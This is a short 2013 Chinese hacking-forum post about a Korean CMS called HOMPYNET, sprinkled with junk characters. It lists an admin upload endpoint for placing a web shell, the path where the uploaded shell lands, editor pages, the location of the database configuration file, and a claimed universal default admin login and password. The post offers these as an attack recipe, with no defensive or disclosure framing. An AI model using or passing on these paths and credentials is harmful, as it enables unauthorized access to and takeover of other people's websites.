找回密码
 立即注册
查看: 3000|回复: 0
打印 上一主题 下一主题

韩国HOMPYNET CMS漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:12:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
上传漏洞  :
  A! k/ O: A$ d* W. ?
- S- U' h9 \1 p8 {http://www.xxx.com/admin/image_a ... p;iname=&iform=* w0 D9 n; w- I" Q
5 y7 X" X; }; G& K' c/ f8 r
http://www.xxx.com/admin/image_a ... p;iname=&iform=
5 {9 T1 G1 K, q2 O0 g9 T9 W' p& m0 ~7 D" w
上传后路径:
" a, Z, l  `1 k" l# c, {
) o3 [2 i7 y" x- M% @" I, G* Whttp://www.xxx.com/bis_web_page/images/shell.php.en
( B  E9 y4 E, s; N2 ~
- O6 E9 p' H6 O4 r编辑器:6 ^4 ?5 x! ?: S" _3 ~9 E

0 \' I3 N2 a' G& P- {' L6 j. ihttp://www.xxx.com/admin/editor/SWE.php) i" ^/ v8 g( q$ r/ ]- w) {

* x* k& D: W9 k& D/ Ohttp://www.xxx.com/program/editor/SWE.php6 q/ D: R: ?# U/ \/ ?% x/ O
* e8 {4 b5 r4 B4 X! x7 f
数据配置文件路径:* n- G6 f: M/ m! [# V

. f5 C( o+ l" d. a% O3 @http://www.xxx.com/m_config/DATA/g_setting.php0 \1 }/ {& B/ N5 n5 Q6 x% w

. E, j( I) I5 t3 h4 U1 T) \. N0 C此程序通用后台账号 :gamsiw  php99, n$ ^0 A' Q* g$ v6 `* S# z& G

) H- [( G$ y4 a0 \8 y9 D6 i0 |( n" [4 `, d( I. u* V* C1 a- I% p7 q
% d7 I" [4 G. V9 r/ b2 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表